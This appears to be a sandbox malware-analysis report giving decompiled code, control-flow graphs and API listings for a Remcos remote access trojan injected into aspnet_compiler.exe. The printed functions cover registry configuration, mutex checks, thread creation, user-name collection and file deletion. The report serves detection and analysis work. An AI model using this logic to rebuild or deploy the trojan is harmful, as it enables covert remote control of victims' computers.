					_t52 = E00401F8B(0x473238); // executed
					E00412831(_t10, "override",  &_v32); // executed
					_t13 = _v32 - 1;
					if(_t13 == 0) {
						goto L5;
					}
					_t22 = _t13 - 1;
					if(_t22 == 0) {
						_t70 = _t66 - 0x1c;
						E004086D0(_t34, _t66 - 0x1c, _t52, __eflags, 0x473220);
						_push(_t34);
						E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
						E00401EE9();
						_push(1);
						E00402073(_t34, _t70 + 0x20 - 0x18, _t25, _t63, "4.6.0 Pro");
						_push("v");
						E00412A57(0x473238, E00401F8B(0x473238));
						E00411D93();
						ExitProcess(0);
					}
					_t77 = _t22 != 1;
					if(_t22 != 1) {
						L6:
						Sleep(0xbb8); // executed
						continue;
					}
					E0040C5A4();
					L5:
					_t67 = _t66 - 0x1c;
					E004086D0(_t34, _t67, _t52, _t77, 0x473220);
					_push(_t34);
					E00412AFC(0x80000001, E00401EE4(E0041A7B9( &_v32, 0x473238)));
					E00401EE9();
					_push(1);
					_t69 = _t67 + 0x20 - 0x18;
					E00402073(_t34, _t69, _t16, _t63, "4.6.0 Pro");
					_push("v");
					E00412A57(0x473238, E00401F8B(0x473238));
					_t66 = _t69 + 0x20;
					goto L6;
				}
			}












                    0x0040ecf0
                    0x0040ed00
                    0x0040ed05
                    0x0040ed05
                    0x0040ed1b
                    0x0040ed1d
                    0x0040ed28
                    0x0040ed2b
                    0x00000000
                    0x00000000
                    0x0040ed2d
                    0x0040ed30
                    0x0040eda9
                    0x0040edaf
                    0x0040edb4
                    0x0040edce
                    0x0040edda
                    0x0040eddf
                    0x0040edeb
                    0x0040edf0
                    0x0040edfe
                    0x0040ee06
                    0x0040ee0d
                    0x0040ee0d
                    0x0040ed32
                    0x0040ed35
                    0x0040ed99
                    0x0040ed9e
                    0x00000000
                    0x0040ed9e
                    0x0040ed37
                    0x0040ed3c
                    0x0040ed3c
                    0x0040ed42
                    0x0040ed47
                    0x0040ed61
                    0x0040ed6d
                    0x0040ed72
                    0x0040ed74
                    0x0040ed7e
                    0x0040ed83
                    0x0040ed91
                    0x0040ed96
                    0x00000000
                    0x0040ed96

                    APIs
                      • Part of subcall function 00412831: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00412851
                      • Part of subcall function 00412831: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00473238), ref: 0041286F
                      • Part of subcall function 00412831: RegCloseKey.KERNELBASE(?), ref: 0041287A
                    • Sleep.KERNELBASE(00000BB8), ref: 0040ED9E
                    • ExitProcess.KERNEL32 ref: 0040EE0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseExitOpenProcessQuerySleepValue
                    • String ID: 2G$4.6.0 Pro$82G$override$pth_unenc
                    • API String ID: 2281282204-2513004603
                    • Opcode ID: b832dd2b5c78ac8d9ddc99e01ae3423e88a5f8e93bb7847c1b73c09c777fd552
                    • Instruction ID: 45cdfc5c20f0b08445f9514382da16a4fbbca6339717cc3b6e195a3b8059c3c5
                    • Opcode Fuzzy Hash: b832dd2b5c78ac8d9ddc99e01ae3423e88a5f8e93bb7847c1b73c09c777fd552
                    • Instruction Fuzzy Hash: 2721DE31B0020127C608B6B79957AAF35999F80708F50447FF809AA2D7EEBD8A5583DF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404F31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58timethreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1581 404f31-404f3f 1582 404f45-404f4c 1581->1582 1583 404fca 1581->1583 1584 404f54-404f5b 1582->1584 1585 404f4e-404f52 1582->1585 1586 404fcc-404fd1 1583->1586 1587 404fa0-404fbd CreateEventA 1584->1587 1588 404f5d-404f9b GetLocalTime call 41a6e9 call 4052dd call 402073 call 41a04a call 401fb8 1584->1588 1585->1587 1590 404fc6-404fc8 1587->1590 1588->1587 1590->1586
                    C-Code - Quality: 91%
                    			E00404F31(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t16;
				void* _t21;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				if( *((char*)(__ecx + 0x5c)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t29 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x470d48;
					if( *0x470d48 != 0) {
						GetLocalTime( &_v20);
						_t16 = E0041A6E9(_t21,  &_v44, _t29);
						_t34 = _t33 - 0x18;
						E004052DD(_t21, _t33 - 0x18, "KeepAlive             | Enabled | Timeout: ", _t32, __eflags, _t16);
						E00402073(_t21, _t34 - 0x14, "KeepAlive             | Enabled | Timeout: ", _t32, "i");
						E0041A04A(_t21, _t29);
						E00401FB8();
					}
				} else {
					 *((char*)(__ecx + 0x7c)) = 1;
				}
				 *((intOrPtr*)(_t31 + 0x74)) = _t29;
				 *((char*)(_t31 + 0x5c)) = 1;
				 *((intOrPtr*)(_t31 + 0x60)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E00405130, _t31, 0, 0); // executed
				return 1;
			}













                    0x00404f38
                    0x00404f3f
                    0x00404fca
                    0x00000000
                    0x00404fca
                    0x00404f49
                    0x00404f4c
                    0x00404f54
                    0x00404f5b
                    0x00404f61
                    0x00404f6c
                    0x00404f71
                    0x00404f7c
                    0x00404f8b
                    0x00404f90
                    0x00404f9b
                    0x00404f9b
                    0x00404f4e
                    0x00404f4e
                    0x00404f4e
                    0x00404fa0
                    0x00404fa9
                    0x00404fbd
                    0x00404fc0
                    0x00000000

                    APIs
                    • GetLocalTime.KERNEL32(00000001,00472EC8,004734E8,?,?,?,?,00415014,?,00000001), ref: 00404F61
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00472EC8,004734E8,?,?,?,?,00415014,?,00000001), ref: 00404FAD
                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$EventLocalThreadTime
                    • String ID: KeepAlive | Enabled | Timeout: $Cqt
                    • API String ID: 2532271599-1719384028
                    • Opcode ID: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                    • Instruction ID: 81ef762065af47e4dab8e296ef88b7c3b87c262db6361300a2954e924f939db2
                    • Opcode Fuzzy Hash: f44067441d12eeb199d79db0566863068f31dfe9cf37c331ee33c08da6605574
                    • Instruction Fuzzy Hash: D711E3719043816AC720AB769C0DE9BBFB89BD6710F04016FF44562282DAB89485CBBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00432142 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E00432142(HCRYPTPROV* __ecx, BYTE* __edx) {
				int _v12;
				int _t2;
				void* _t6;
				BYTE* _t9;
				long** _t10;

				_t10 = __ecx;
				_t9 = __edx;
				_t2 = CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000); // executed
				if(_t2 != 0) {
					if(CryptGenRandom( *_t10, _v12, _t9) != 0) {
						CryptReleaseContext( *_t10, 0);
						return 0;
					}
					_push(0xffffff98);
					L2:
					_pop(_t6);
					return _t6;
				}
				_push(0xffffff99);
				goto L2;
			}








                    0x0043214d
                    0x0043214f
                    0x00432154
                    0x0043215c
                    0x00432172
                    0x0043217c
                    0x00000000
                    0x00432182
                    0x00432174
                    0x00432160
                    0x00432160
                    0x00000000
                    0x00432160
                    0x0043215e
                    0x00000000

                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431DCA,00000034,?,?,00EE6528), ref: 00432154
                    • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000), ref: 0043216A
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431E5D,00000000,?,00000000,0041CB5C), ref: 0043217C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                    • Instruction ID: adb372f61302f159ea37c7bd5427d8c721a4b5411f3f4e54cdc0eebfb1d2689f
                    • Opcode Fuzzy Hash: 87b52fe04148b378890c993190cc93a161ae8e284d280082790b9f2e946aa0e2
                    • Instruction Fuzzy Hash: 98E0923130C310BBFF310F25BE08F173A94EB89B75F21063AF211E40E4D6918801961C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041A168 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E0041A168(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v36;
				char _v60;
				char _v92;
				short _v604;
				void* __ebp;
				void* _t26;
				void* _t35;
				void* _t39;
				void* _t40;
				void* _t41;

				_t41 = __eflags;
				_t35 = __edx;
				_v8 = 0x10;
				_t39 = __ecx;
				 *0x472afc(1,  &_v92,  &_v8); // executed
				_v12 = 0x100;
				GetUserNameW( &_v604,  &_v12); // executed
				E00402FF4(_t26, _t39, E004042DC(_t26,  &_v36,  &_v92, _t40, _t41, E0040415E(_t26,  &_v60, _t35, _t40, "/")), __edi, _t40, _t41,  &_v604);
				E00401EE9();
				E00401EE9();
				return _t39;
			}















                    0x0041a168
                    0x0041a168
                    0x0041a175
                    0x0041a180
                    0x0041a185
                    0x0041a18e
                    0x0041a19d
                    0x0041a1c8
                    0x0041a1d1
                    0x0041a1d9
                    0x0041a1e4

                    APIs
                    • GetUserNameW.ADVAPI32(?,00000010), ref: 0041A19D
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 42a164d2d012b871ed5a935197de62b022d1b451b17e784ad711071e8924de7d
                    • Instruction ID: ca40992a929d7f440b27bf36de23ad6c7f00c11e63c364431abc424016e70018
                    • Opcode Fuzzy Hash: 42a164d2d012b871ed5a935197de62b022d1b451b17e784ad711071e8924de7d
                    • Instruction Fuzzy Hash: 1F01FF7290011DABCB04EBD5DC45ADEB7BCEF44319F10016AB505B61D1EEB86A89CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004255BC Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                    • Instruction ID: 746b65c02e61119df28bf9f7234443caa874ec4429a0c44ab9f61596d4479e10
                    • Opcode Fuzzy Hash: 4a5bcecb3f40c54b5b167585e102f21ee889ffcc3164b5e38b4e4b437a608611
                    • Instruction Fuzzy Hash: 96B092B9108202FFCA160B60DD0887A7EAAABC8381F008A2CF186411B1C636C451AB26
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00433452 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00433452() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0043345E); // executed
				return _t1;
			}




                    0x00433457
                    0x0043345d

                    APIs
                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0003345E,00433185), ref: 00433457
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                    • Instruction ID: 3c5ffc1f6ca5581617dc18551564c5a1f11bccfc48c0ed950457c3a26c38d402
                    • Opcode Fuzzy Hash: fb3aaaa52268b5920dbf3edef77856ac2629be7d88f1c4c86b65aace9ef12b18
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040DEC9 Relevance: 86.6, APIs: 17, Strings: 32, Instructions: 804COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 7 40dec9-40df4b call 41b4c9 GetModuleFileNameW call 40e8e0 call 4020d6 * 2 call 41a976 call 40f05a call 401e6d call 43e5d0 24 40df97-40e05f call 401e45 call 401f8b call 401e45 call 4052fe call 408832 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->24 25 40df4d-40df92 call 40f0f6 call 401e45 call 401f8b call 41047a call 40f0a7 call 40e8cd 7->25 71 40e061-40e0ac call 406292 call 401fc2 call 401fb8 call 401f8b call 412831 24->71 72 40e0b2-40e0cd call 401e45 call 40af37 24->72 51 40e423-40e434 call 401fb8 25->51 71->72 105 40e86c-40e887 call 401f8b call 412c91 call 4119b8 71->105 81 40e141-40e148 call 40c577 72->81 82 40e0cf-40e0f0 call 401e45 call 401f8b OpenMutexA 72->82 91 40e151-40e158 81->91 92 40e14a-40e14c 81->92 99 40e0f2-40e0ff WaitForSingleObject CloseHandle 82->99 100 40e105-40e126 call 401f8b call 412831 82->100 96 40e15a 91->96 97 40e15c-40e168 call 419e1e 91->97 95 40e422 92->95 95->51 96->97 107 40e171-40e175 97->107 108 40e16a-40e16c 97->108 99->100 122 40e128-40e13b call 401f8b call 412c91 100->122 123 40e13c 100->123 129 40e88c-40e8bd call 41a7b9 call 401ee4 call 412d0b call 401ee9 * 2 105->129 111 40e1b4-40e1c7 call 401e45 call 401f8b 107->111 112 40e177 call 406d8a 107->112 108->107 136 40e1c9 call 406dc9 111->136 137 40e1ce-40e249 call 401e45 call 401f8b call 4086cb call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 111->137 121 40e17c-40e17e 112->121 126 40e180-40e185 call 406dac call 4068d4 121->126 127 40e18a-40e19d call 401e45 call 401f8b 121->127 122->123 123->81 126->127 127->111 151 40e19f-40e1a5 127->151 166 40e8c2-40e8cc call 40d246 call 414271 129->166 136->137 184 40e2b1-40e2b5 137->184 185 40e24b-40e264 call 401e45 call 401f8b call 43a3d6 137->185 151->111 154 40e1a7-40e1ad 151->154 154->111 157 40e1af call 4068d4 154->157 157->111 187 40e437-40e497 call 435760 call 40245c call 401f8b * 2 call 4129e0 call 4086cb 184->187 188 40e2bb-40e2c2 184->188 185->184 211 40e266-40e2ac call 401e45 call 401f8b call 401e45 call 401f8b call 40cf38 call 401ef3 call 401ee9 185->211 241 40e49c-40e4f0 call 401e45 call 401f8b call 402073 call 401f8b call 412a57 call 401e45 call 401f8b call 43a3ac 187->241 190 40e340-40e34a call 4086cb 188->190 191 40e2c4-40e33e call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40c307 188->191 197 40e34f-40e373 call 40245c call 4330a3 190->197 191->197 218 40e382 197->218 219 40e375-40e380 call 435760 197->219 211->184 224 40e384-40e3cf call 401ee4 call 43e0d9 call 40245c call 401f8b call 40245c call 401f8b call 412c2f 218->224 219->224 279 40e3d4-40e3f9 call 4330ac call 401e45 call 40af37 224->279 293 40e4f2 241->293 294 40e50d-40e50f 241->294 279->241 295 40e3ff-40e41e call 401e45 call 41a7b9 call 40e991 279->295 296 40e4f4-40e50b call 41b6a6 CreateThread 293->296 297 40e511-40e513 294->297 298 40e515 294->298 295->241 313 40e420 295->313 302 40e51b-40e5e3 call 402073 * 2 call 41a04a call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 43a3ac call 401e45 call 401f8b call 401e45 call 401f8b call 40949a call 401e45 call 401f8b 296->302 297->296 298->302 347 40e5e5-40e61c call 432df5 call 401e45 call 401f8b CreateThread 302->347 348 40e61e 302->348 313->95 350 40e620-40e638 call 401e45 call 401f8b 347->350 348->350 359 40e676-40e689 call 401e45 call 401f8b 350->359 360 40e63a-40e671 call 432df5 call 401e45 call 401f8b CreateThread 350->360 371 40e6e9-40e6fc call 401e45 call 401f8b 359->371 372 40e68b-40e6e4 call 401e45 call 401f8b call 401e45 call 401f8b call 40ceec call 401ef3 call 401ee9 CreateThread 359->372 360->359 382 40e737-40e75b call 41a168 call 401ef3 call 401ee9 371->382 383 40e6fe-40e732 call 401e45 call 401f8b call 401e45 call 401f8b call 43a3ac call 40b6dc 371->383 372->371 403 40e760-40e773 CreateThread 382->403 404 40e75d-40e75e SetProcessDEPPolicy 382->404 383->382 407 40e781-40e788 403->407 408 40e775-40e77f CreateThread 403->408 404->403 411 40e796-40e79d 407->411 412 40e78a-40e794 CreateThread 407->412 408->407 415 40e7ab 411->415 416 40e79f-40e7a2 411->416 412->411 421 40e7b0-40e7e4 call 402073 call 4052dd call 402073 call 41a04a call 401fb8 415->421 418 40e7a4-40e7a9 416->418 419 40e7e9-40e7fc call 401f8b call 4127e7 416->419 418->421 429 40e801-40e804 419->429 421->419 429->166 431 40e80a-40e84a call 41a7b9 call 401ee4 call 412903 call 401ee9 call 401ee4 429->431 446 40e863-40e868 DeleteFileW 431->446 447 40e86a 446->447 448 40e84c-40e84f 446->448 447->129 448->129 449 40e851-40e85e Sleep call 401ee4 448->449 449->446
                    C-Code - Quality: 91%
                    			E0040DEC9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v752;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				char _v780;
				char _v784;
				intOrPtr _v796;
				intOrPtr _v812;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t76;
				void* _t79;
				char* _t94;
				void* _t95;
				struct _SECURITY_ATTRIBUTES* _t97;
				struct _SECURITY_ATTRIBUTES* _t98;
				struct _SECURITY_ATTRIBUTES* _t100;
				void* _t116;
				void* _t117;
				void* _t124;
				char _t130;
				struct _SECURITY_ATTRIBUTES** _t135;
				signed char* _t140;
				void* _t143;
				void* _t145;
				void* _t158;
				struct _SECURITY_ATTRIBUTES* _t161;
				intOrPtr _t163;
				struct _SECURITY_ATTRIBUTES* _t164;
				struct _SECURITY_ATTRIBUTES* _t171;
				WCHAR* _t179;
				struct _SECURITY_ATTRIBUTES* _t180;
				intOrPtr _t194;
				intOrPtr* _t197;
				void* _t199;
				void* _t204;
				char* _t207;
				void* _t209;
				void* _t217;
				void* _t223;
				void* _t224;
				signed int _t225;
				char* _t232;
				void* _t234;
				intOrPtr* _t243;
				void* _t245;
				intOrPtr* _t253;
				void* _t255;
				struct _SECURITY_ATTRIBUTES* _t273;
				void* _t286;
				struct _SECURITY_ATTRIBUTES* _t287;
				struct _SECURITY_ATTRIBUTES* _t297;
				intOrPtr* _t305;
				void* _t324;
				char* _t382;
				signed int _t414;
				signed int _t418;
				char _t420;
				void* _t423;
				void* _t479;
				void* _t496;
				struct _SECURITY_ATTRIBUTES* _t497;
				intOrPtr _t498;
				char* _t503;
				intOrPtr* _t505;
				void* _t508;
				void* _t509;
				struct _SECURITY_ATTRIBUTES* _t510;
				void* _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				void* _t522;
				void* _t523;
				void* _t524;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t529;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t537;

				_t537 = __eflags;
				_t479 = __edx;
				_t517 = _t519;
				 *0x470d40 = _a4;
				_push(_t286);
				E0041B4C9();
				_t497 = 0;
				GetModuleFileNameW(0, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", 0x104);
				E0040E8E0( &_v724, _t479, _t537);
				_t522 = (_t519 & 0xfffffff8) - 0x2f4;
				E004020D6(_t286, _t522, _t479, _t537, 0x4732bc);
				_t523 = _t522 - 0x18;
				E004020D6(_t286, _t523, _t479, _t537,  &_v728);
				_t76 = E0041A976( &_v756, _t479); // executed
				_t524 = _t523 + 0x30;
				E0040F05A(_t479, _t76);
				E00401E6D( &_v760, _t479);
				_t79 = E0043E5D0(_a12, "-l");
				_t305 = _t496;
				if(_t79 != 0) {
					_t287 = 3;
					_t501 = 0x473298;
					__eflags =  *((char*)(E00401F8B(E00401E45(0x473298, _t479, _t517, __eflags, _t287))));
					 *0x470b32 = __eflags != 0;
					_t481 = E004052FE( &_v780, "Software\\", _t517, E00401E45(0x473298, _t479, _t517, __eflags, 0xe));
					E00401FC2(0x473238, _t83, 0x473298, E00408832(_t287,  &_v756, _t83, 0, _t517, __eflags, "\\"));
					E00401FB8();
					E00401FB8();
					E00401FA0(0x473268, E00401E45(0x473298, _t83, _t517, __eflags, 0xe));
					L00405A86(_t287, 0x4732d4, _t83, "Exe");
					E00401E45(0x473298, _t83, _t517, __eflags, 0x32);
					__eflags =  *((char*)(E004051C3(0)));
					 *0x470d4b = __eflags != 0;
					E00401E45(0x473298, _t83, _t517, __eflags, 0x33);
					_t94 = E004051C3(0);
					__eflags =  *_t94;
					 *0x470d60 =  *_t94 != 0;
					__eflags =  *0x470d4b;
					if(__eflags == 0) {
						L5:
						_v776 = _t497;
						_t95 = E00401E45(_t501, _t481, _t517, __eflags, 0xd);
						_t482 = "0";
						_t324 = _t95;
						__eflags = E0040AF37(__eflags);
						if(__eflags != 0) {
							_t514 = OpenMutexA(0x100000, _t497, E00401F8B(E00401E45(_t501, "0", _t517, __eflags, 7)));
							__eflags = _t514;
							if(_t514 != 0) {
								WaitForSingleObject(_t514, 0xea60);
								CloseHandle(_t514);
							}
							_t482 = E00401F8B(0x473238);
							_t273 = E00412831(_t272, "Inj",  &_v776);
							_pop(_t324);
							__eflags = _t273;
							if(_t273 != 0) {
								_t482 = E00401F8B(0x473238);
								E00412C91(_t274, __eflags, "Inj");
								_pop(_t324);
							}
							_t501 = 0x473298;
						}
						_t97 = E0040C577();
						__eflags = _t97;
						if(_t97 != 0) {
							_t98 =  *0x472adc;
							__eflags = _t98;
							if(__eflags != 0) {
								_t98->nLength(); // executed
							}
							E00419E1E(_t324, __eflags); // executed
							_t100 =  *0x472ae8;
							__eflags = _t100;
							if(_t100 != 0) {
								 *0x46f9d0 = _t100->nLength();
							}
							__eflags = _v776 - _t497;
							if(__eflags == 0) {
								__eflags = E00406D8A(_t324);
								if(__eflags != 0) {
									E00406DAC();
									E004068D4(_t501);
								}
								__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x2e))));
								if(__eflags != 0) {
									__eflags =  *0x472ae8 - _t497;
									if(__eflags != 0) {
										__eflags =  *0x46f9d0 - _t497; // 0x1
										if(__eflags == 0) {
											E004068D4(_t501);
										}
									}
								}
							}
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x27))));
							if(__eflags != 0) {
								E00406DC9();
							}
							L004086CB(_t287, 0x473208, _t482, E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xb)));
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 4))));
							 *0x470b33 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 5))));
							 *0x470b30 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 8))));
							 *0x470b31 = __eflags != 0;
							__eflags =  *((char*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, _t287))));
							if(__eflags != 0) {
								__eflags = E0043A3D6(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x30)));
								if(__eflags != 0) {
									_t253 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
									_t255 = E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30));
									_t482 =  *_t253;
									E00401EF3(0x473250,  *_t253, _t253, E0040CF38( &_v780,  *_t253, _t255));
									E00401EE9();
									_t501 = 0x473298;
								}
							}
							__eflags = _v776 - _t497;
							if(_v776 != _t497) {
								E00435760(_t497,  &_v524, _t497, 0x208);
								_t288 = 0x473280;
								_t116 = E0040245C();
								_t117 = E00401F8B(0x473280);
								_t483 = E00401F8B(0x473238);
								E004129E0(_t119, "exepath",  &_v524, 0x208, _t117, _t116);
								_t526 = _t524 + 0x20;
								L004086CB(0x473280, 0x473220, _t119,  &_v524);
								_t503 = 0x473298;
								goto L42;
							} else {
								__eflags =  *0x470b32;
								if(__eflags == 0) {
									L004086CB(_t287, 0x473220, _t482, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
								} else {
									E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0x1e));
									_t297 =  *((intOrPtr*)(E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 0xc))));
									_t243 = E00401F8B(E00401E45(_t501, _t482, _t517, __eflags, 9));
									__eflags = _t297;
									_t501 = _t243;
									__eflags = _t297;
									_t245 = E00401F8B(E00401E45(0x473298, _t482, _t517, _t297, 0xa));
									E0040C307( *_t243, E00401F8B(E00401E45(0x473298, _t482, _t517, __eflags, 0x30)), __eflags, _t245, ((_t242 & 0xffffff00 | _t297 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t242 & 0xffffff00 | _t297 != 0x00000000) & 0x000000ff);
									_t524 = _t524 + 0xc;
								}
								_t217 = E0040245C();
								_t423 = 2;
								_t294 =  ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220;
								_push( ~(__eflags > 0) | (_t217 + 0x00000001) * 0x00473220);
								_t510 = E004330A3(_t423, (_t217 + 1) * 0x473220 >> 0x20, _t501, __eflags);
								__eflags = _t510;
								if(_t510 == 0) {
									_t510 = _t497;
								} else {
									E00435760(_t497, _t510, _t497, _t294);
									_t524 = _t524 + 0xc;
								}
								E0043E0D9(_t510, E00401EE4(0x473220));
								_t288 = 0x473280;
								_t223 = E0040245C();
								_t224 = E00401F8B(0x473280);
								_t225 = E0040245C();
								E00412C2F(E00401F8B(0x473238), __eflags, "exepath", _t510, 2 + _t225 * 2, _t224, _t223); // executed
								E004330AC(_t510);
								_t526 = _t524 + 0x1c;
								_t503 = 0x473298;
								E00401E45(0x473298, _t227, _t517, __eflags, 0xd);
								_t483 = "0";
								__eflags = E0040AF37(__eflags);
								if(__eflags == 0) {
									L42:
									_push(1);
									_t124 = E00401F8B(E00401E45(_t503, _t483, _t517, __eflags, 0x34));
									_t527 = _t526 - 0x18;
									E00402073(_t288, _t527, _t483, _t517, _t124);
									_push("licence");
									_t484 = E00401F8B(0x473238); // executed
									E00412A57(0x473238, _t126); // executed
									_t528 = _t527 + 0x20;
									_t130 = E0043A3AC(_t128, E00401F8B(E00401E45(_t503, _t126, _t517, __eflags, 0x28)));
									 *0x470d48 = _t130;
									__eflags = _t130 - 2;
									if(_t130 != 2) {
										__eflags = _t130 - 1;
										if(_t130 != 1) {
											_t498 = CreateThread;
										} else {
											_t420 = 0;
											goto L44;
										}
									} else {
										_t420 = 1;
										L44:
										E0041B6A6(_t288, _t420, _t484, _t497);
										_t498 = __imp__CreateThread; // 0x747143e0
										CreateThread(_t497, _t497, E0041BD68, _t497, _t497, _t497);
									}
									_t529 = _t528 - 0x18;
									E00402073(_t288, _t529, _t484, _t517, "Remcos Agent initialized");
									_t530 = _t529 - 0x18;
									E00402073(_t288, _t530, _t484, _t517, "i");
									E0041A04A(_t288, _t498);
									_t531 = _t530 + 0x30;
									_t135 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x37));
									_v796 =  *((intOrPtr*)(E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0x10))));
									_t140 = E00401F8B(E00401E45(_t503, _t484, _t517, __eflags, 0xf));
									__eflags =  *_t135;
									_t504 = _t140;
									_t143 = E0043A3AC(_t141, E00401F8B(E00401E45(0x473298, _t484, _t517,  *_t135, 0x36)));
									_t145 = E00401F8B(E00401E45(0x473298, _t484, _t517, __eflags, 0x11));
